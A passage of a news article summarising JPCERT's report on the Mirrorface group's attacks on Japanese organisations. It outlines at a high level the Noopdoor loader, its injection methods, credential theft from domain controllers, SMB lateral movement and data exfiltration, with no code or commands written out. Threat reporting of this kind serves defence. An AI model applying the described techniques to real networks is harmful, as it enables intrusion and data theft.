According to the Japanese Coordination Center (JPCERT), a group of hackers known as Mirrorface has been targeting media, political organizations, and academic institutions in Japan since 2022. Recently, these attackers have expanded their targets to include manufacturers and research institutes. The attacks have evolved from targeted phishing emails to exploiting vulnerabilities in products from Array AG and Fortigate.
After infiltrating the network, hackers use malicious software known as Noopdoor and various data extraction tools. Noopdoor is a shell code that is inserted into legitimate applications using two different methods.
The first method involves launching Noopdoor through an XML file that contains hidden code compiled and executed using MSBuild. This method stores encrypted data in specific registers for later use.
The second method uses a DLL file to load Noopldr into legitimate applications, concealing its actions through complex code obfuscation methods. Both methods retrieve encrypted data from files or the registry and decrypt them using AES-CBC based on system information.
Noopldr samples come in different formats (XML and DLL) and are implemented into Windows processes differently. XML variants mainly utilize legitimate processes to execute and store encrypted payloads in the registry, while DLL variants exhibit more complex behaviors, including service installation and registry hiding.
Some samples utilize processes like “Wuaucilt.exe” for injection, while others rely on “LSASS.EXE”, “Svchost.exe”, and “vdsldr.exe”. DLL variants also utilize Control Flow Flattening (CFF) to complicate analysis. To assist with analysis, JPCert/CC provides a Python script on GitHub.
Noopdoor communicates over Port 443 using a DGA generation algorithm and receives commands through Port 47000. In addition to standard actions such as file transfer and execution, Noopdoor can manipulate temporary file markers, complicating forensic investigations.
The hackers aim to obtain Windows network accounts by analyzing memory process dumps, the NTDS.DIT database on the Domain controller, and sensitive registry sections (System, SAM, Security).
Once they gain administrator privileges on the Windows network, hackers distribute malicious software via SMB and scheduled tasks, specifically targeting file servers, Active Directory, and antivirus management servers.
Following penetration, attackers conduct reconnaissance using commands like Auditpol, Bitsadmin, and DFSUTIL. They extract data using Winrar and SFTP after scanning files with the Dir /S command and targeting OneDrive, Teams, IIS, and other services.
The sophisticated techniques used by Mirrorface hackers demonstrate that cybersecurity is a dynamic process, not a static state. Organizations